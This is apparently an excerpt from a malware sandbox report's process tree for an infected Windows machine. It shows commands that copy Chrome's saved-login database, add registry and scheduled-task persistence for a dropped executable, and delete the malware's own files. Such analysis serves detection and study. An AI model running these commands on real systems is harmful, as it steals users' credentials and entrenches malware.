      "C:\Users\Admin\AppData\Local\Temp\is-5CJ72.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$601FA,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS094ED586\Sat1481f5a7e3eccdd.exe" /SILENT
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetWindowsHookEx
      PID:5740
    - - C:\Users\Admin\AppData\Local\Temp\is-IFPIV.tmp\postback.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-IFPIV.tmp\postback.exe" ss1
        5⤵
        
        PID:5716

C:\Windows\SysWOW64\wscript.exe
"C:\Windows\SysWOW64\wscript.exe"
1⤵
PID:5768
- C:\Windows\SysWOW64\cmd.exe
  /c del "C:\Users\Admin\Pictures\Adobe Films\A5rF7e8bAs42GoFgu7_ou5fF.exe"
  2⤵
  PID:6844
- C:\Windows\SysWOW64\cmd.exe
  /c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
  2⤵
  - Blocklisted process makes network request
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetWindowsHookEx
  PID:3204
- C:\Program Files\Mozilla Firefox\Firefox.exe
  "C:\Program Files\Mozilla Firefox\Firefox.exe"
  2⤵
  PID:8864

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:5972

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6212
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:4288

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:6176

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x134,0x138,0x13c,0x110,0x140,0x7ff737669e70,0x7ff737669e80,0x7ff737669e90
1⤵
PID:6512

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:3204

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:2948

C:\Users\Admin\AppData\Roaming\eewufrr
C:\Users\Admin\AppData\Roaming\eewufrr
1⤵
PID:4980

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7872

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7264

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:7508
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 61CC31877A04E5BC989F891A96397D22 C
  2⤵
  PID:4916
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding AC64D4921692F675ECC6AE22AF4190F2 C
  2⤵
  PID:4764
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 4408BB694B8A13D7AD401CCDB26E07FB
  2⤵
  PID:8864
- C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe
  "C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe"
  2⤵
  PID:8020
- - C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\RequiredApplication_1\Settings%20Installation.exe
    "C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\RequiredApplication_1\Settings%20Installation.exe" -silent=1 -CID=778 -SID=778 -submn=default
    3⤵
    PID:1928
  - - C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
      "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" "--loGQqfG2tg"
      4⤵
      PID:6344
    - - C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
        
        C:\Users\Admin\AppData\Roaming\Settings\Settings.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Settings\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Settings\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Settings\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Settings\User Data" --annotation=plat=Win64 --annotation=prod=Settings --annotation=ver=0.0.13 --initial-client-data=0x224,0x228,0x22c,0x1f0,0x230,0x7ffc4c4bdec0,0x7ffc4c4bded0,0x7ffc4c4bdee0
        5⤵
        
        PID:9072
      - C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
        
        C:\Users\Admin\AppData\Roaming\Settings\Settings.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Settings\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Settings\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Settings --annotation=ver=0.0.13 --initial-client-data=0x124,0x11c,0xf8,0x120,0x128,0x7ff6dea09e70,0x7ff6dea09e80,0x7ff6dea09e90
        6⤵
        
        PID:8464
    - - C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
        
        "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,2719062393202946596,4389878226556984135,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6344_885290396" --mojo-platform-channel-handle=1788 /prefetch:8
        5⤵
        
        PID:6172
    - - C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
        
        "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=gpu-process --field-trial-handle=1536,2719062393202946596,4389878226556984135,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6344_885290396" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1560 /prefetch:2
        5⤵
        
        PID:5564
    - - C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
        
        "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Settings\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1536,2719062393202946596,4389878226556984135,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6344_885290396" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2384 /prefetch:1
        5⤵
        
        PID:6440
    - - C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
        
        "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Settings\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1536,2719062393202946596,4389878226556984135,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6344_885290396" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2380 /prefetch:1
        5⤵
        
        PID:5916
    - - C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
        
        "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1536,2719062393202946596,4389878226556984135,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6344_885290396" --mojo-platform-channel-handle=2020 /prefetch:8
        5⤵
        
        PID:6692
    - - C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
        
        "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1536,2719062393202946596,4389878226556984135,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6344_885290396" --mojo-platform-channel-handle=3096 /prefetch:8
        5⤵
        
        PID:7860
    - - C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
        
        "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=gpu-process --field-trial-handle=1536,2719062393202946596,4389878226556984135,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6344_885290396" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3116 /prefetch:2
        5⤵
        
        PID:3204
    - - C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
        
        "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1536,2719062393202946596,4389878226556984135,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6344_885290396" --mojo-platform-channel-handle=3332 /prefetch:8
        5⤵
        
        PID:3112
    - - C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
        
        "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1536,2719062393202946596,4389878226556984135,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6344_885290396" --mojo-platform-channel-handle=3444 /prefetch:8
        5⤵
        
        PID:2164
    - - C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
        
        "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1536,2719062393202946596,4389878226556984135,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6344_885290396" --mojo-platform-channel-handle=2120 /prefetch:8
        5⤵
        
        PID:4932
    - - C:\Users\Admin\AppData\Roaming\Settings\Settings.exe
        
        "C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1536,2719062393202946596,4389878226556984135,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6344_885290396" --mojo-platform-channel-handle=3580 /prefetch:8
        5⤵
        
        PID:7980
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_23C3.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites' -retry_count 10"
    3⤵
    PID:5624

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4788

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8796

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8396

C:\Users\Admin\AppData\Local\Temp\C253.exe
C:\Users\Admin\AppData\Local\Temp\C253.exe
1⤵
PID:8756
- C:\Users\Admin\AppData\Local\Temp\C253.exe
  C:\Users\Admin\AppData\Local\Temp\C253.exe
  2⤵
  PID:8332

C:\Users\Admin\AppData\Local\Temp\C87E.exe
C:\Users\Admin\AppData\Local\Temp\C87E.exe
1⤵
PID:936
- C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
  "C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
  2⤵
  PID:6768

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6584
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:8736

C:\Users\Admin\AppData\Local\Temp\FF3F.exe
C:\Users\Admin\AppData\Local\Temp\FF3F.exe
1⤵
PID:3300

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5192
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:32

C:\Users\Admin\AppData\Local\Temp\5AED.exe
C:\Users\Admin\AppData\Local\Temp\5AED.exe
1⤵
PID:2188

C:\Users\Admin\AppData\Local\Temp\923A.exe
C:\Users\Admin\AppData\Local\Temp\923A.exe
1⤵
PID:8796
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /im 923A.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\923A.exe" & del C:\ProgramData\*.dll & exit
  2⤵
  PID:7312
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im 923A.exe /f
    3⤵
    - Kills process with taskkill
    PID:4604
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 6
    3⤵
    - Delays execution with timeout.exe
    PID:8808

C:\Users\Admin\AppData\Local\Temp\9B05.exe
C:\Users\Admin\AppData\Local\Temp\9B05.exe
1⤵
PID:7864
- C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
  "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"
  2⤵
  PID:6336
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\
    3⤵
    PID:2436
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\
      4⤵
      PID:3116
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:7028

C:\Users\Admin\AppData\Local\Temp\AFB7.exe
C:\Users\Admin\AppData\Local\Temp\AFB7.exe
1⤵
PID:8748

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6560
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:7960

C:\Users\Admin\AppData\Local\Temp\DD9E.exe
C:\Users\Admin\AppData\Local\Temp\DD9E.exe
1⤵
PID:8356

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:8740

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:7700

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:7020

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:2300

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8612

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:3496

C:\Program Files (x86)\Pad0tv\cbarhj.exe
"C:\Program Files (x86)\Pad0tv\cbarhj.exe"
1⤵
PID:7660

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8680

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:3880

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:8036

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:7304

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8620

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:5816

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:8696

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4604

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:2368

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:2272

C:\Users\Admin\AppData\Roaming\eewufrr
C:\Users\Admin\AppData\Roaming\eewufrr
1⤵
PID:6956

C:\Users\Admin\AppData\Roaming\ahwufrr
C:\Users\Admin\AppData\Roaming\ahwufrr
1⤵
PID:7800
- C:\Users\Admin\AppData\Roaming\ahwufrr
  C:\Users\Admin\AppData\Roaming\ahwufrr
  2⤵
  PID:2436

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:9112

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:3396

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:7844

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4316

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7376

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:6100

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7948

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:1308

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7324

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:5912

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:7144

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:3568

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:5808

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:5764

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8552

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8936

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:6124

C:\Users\Admin\AppData\Roaming\eewufrr
C:\Users\Admin\AppData\Roaming\eewufrr
1⤵
PID:6928

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:4464

C:\Users\Admin\AppData\Roaming\ahwufrr
C:\Users\Admin\AppData\Roaming\ahwufrr
1⤵
PID:3256
- C:\Users\Admin\AppData\Roaming\ahwufrr
  C:\Users\Admin\AppData\Roaming\ahwufrr
  2⤵
  PID:5456

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4536

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4488

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:7548

C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
1⤵
PID:6332

